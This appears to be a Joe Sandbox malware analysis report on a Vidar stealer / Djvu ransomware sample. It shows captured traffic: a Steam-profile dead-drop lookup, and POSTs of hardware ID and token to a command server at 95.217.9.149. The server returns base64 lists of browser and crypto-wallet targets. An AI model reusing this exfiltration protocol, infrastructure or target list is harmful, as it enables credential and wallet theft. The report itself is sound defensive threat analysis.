{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vG7Vp23TNFhlhoVbONIFzGjjQ%2FzfVTvmXAwbLtQG8jrx2zohi%2FRf7zPbNK8oqqABKsTzQxh6WzAotM060D7cEVYrUeVJSWk1J9ZcbHKJvLFeHwnI6IUfA5CQacP0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8796331adeea0d20-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 12:47:03 UTC	459	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 37 30 31 38 31 35 31 63 30 30 33 30 34 32 31 39 30 30 35 65 31 64 31 35 34 66 30 33 30 35 31 32 31 61 31 35 31 33 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#7018151c00304219005e1d154f0305121a1513
2024-04-24 12:47:03 UTC	363	IN	Data Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 35 61 64 61 30 61 39 62 35 38 35 66 37 61 63 62 35 65 62 62 30 61 34 66 61 62 36 62 30 61 37 61 66 61 30 61 36 62 31 66 38 66 37 61 63 62 35 65 62 62 30 61 34 22 3e 3c 73 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#c5ada0a9b585f7acb5ebb0a4fab6b0a7afa0a6b1f8f7acb5ebb0a4"><s
2024-04-24 12:47:03 UTC	114	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2024-04-24 12:47:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:04 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-24 12:47:05 UTC	914	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 24 Apr 2024 12:47:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Os7%2FMCseOSrleyiHp4OQyonpFhwQgEHPl04jG%2FaLJzn9M6vrPSrYF2F2CnQwwMB8Y7O3qCsoHQig5s5fnVc8z%2FmZHTmcWMzNYJe05JDBMef1wZ%2BJeZ5Sz08XbH8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 879633277a122ad5-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 12:47:05 UTC	455	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 32 64 34 35 34 38 34 31 35 64 36 64 31 66 34 34 35 64 30 33 34 30 34 38 31 32 35 65 35 38 34 66 34 37 34 38 34 65 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#2d4548415d6d1f445d034048125e584f47484e
2024-04-24 12:47:05 UTC	367	IN	Data Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 62 35 33 35 65 35 37 34 62 37 62 30 39 35 32 34 62 31 35 34 65 35 61 30 34 34 38 34 65 35 39 35 31 35 65 35 38 34 66 30 36 30 39 35 32 34 62 31 35 34 65 35 61 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#3b535e574b7b09524b154e5a04484e59515e584f0609524b154e5a
2024-04-24 12:47:05 UTC	114	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2024-04-24 12:47:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:08 UTC	119	OUT	GET /profiles/76561199673019888 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:09 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 24 Apr 2024 12:47:09 GMT Content-Length: 33790 Connection: close Set-Cookie: sessionid=b9308d92ca211ee572879cd2; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C8efca4b9dedd65f9ac922759639cacad; Path=/; Secure; HttpOnly; SameSite=None
2024-04-24 12:47:09 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-24 12:47:09 UTC	16384	IN	Data Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-24 12:47:09 UTC	2892	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 75 6e 74 5f 6c 69 6e 6b 5f 70 72 65 76 69 65 77 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 20 6c 65 66 74 3b 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 6d 61 69 6e 74 61 69 6e 58 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 62 46 6f 63 75 73 52 69 6e 67 52 6f 6f 74 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f Data Ascii: <div class="profile_count_link_preview"><div style="clear: left;"></div></div></div></div><div data-panel="{"maintainX":true,"bFocusRingRoot":true,&quo

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:10 UTC	169	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 12:47:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:12 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:12 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 33 35 43 31 44 44 39 36 32 45 33 34 34 31 30 34 31 38 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="hwid"A235C1DD962E3441041814-a33c7340-61ca-11ee-8c18-806e6f6e6963------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------
2024-04-24 12:47:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 12:47:13 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 32 63 33 61 30 39 62 39 37 64 35 37 66 37 38 31 66 62 62 34 39 62 37 63 61 64 64 30 64 31 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|d2c3a09b97d57f781fbb49b7cadd0d1c\|1\|1\|1\|0\|0\|50000\|00

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:14 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:14 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 63 33 61 30 39 62 39 37 64 35 37 66 37 38 31 66 62 62 34 39 62 37 63 61 64 64 30 64 31 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="token"d2c3a09b97d57f781fbb49b7cadd0d1c------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------ECAEGHIJEHJDHIDHIDAECont
2024-04-24 12:47:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 12:47:15 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:16 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 63 33 61 30 39 62 39 37 64 35 37 66 37 38 31 66 62 62 34 39 62 37 63 61 64 64 30 64 31 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="token"d2c3a09b97d57f781fbb49b7cadd0d1c------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------ECFHJKEBAAECBFHIECGICont
2024-04-24 12:47:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 12:47:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 12:47:17 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sIQywRNC5M.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: Djvu

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAKEGIJEHJDGDHJKJKKJ

C:\ProgramData\AKKFHDAK

C:\ProgramData\DGHIECGCBKFHIEBGHDBKFHJDGI

C:\SystemID\PersonalID.txt

C:\Users\user\.curlrc

C:\Users\user\.curlrc.bgzq (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.bgzq (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

Windows Analysis Report
sIQywRNC5M.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:19 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 6925 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 12:47:19 UTC	6925	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 63 33 61 30 39 62 39 37 64 35 37 66 37 38 31 66 62 62 34 39 62 37 63 61 64 64 30 64 31 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"d2c3a09b97d57f781fbb49b7cadd0d1c------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; 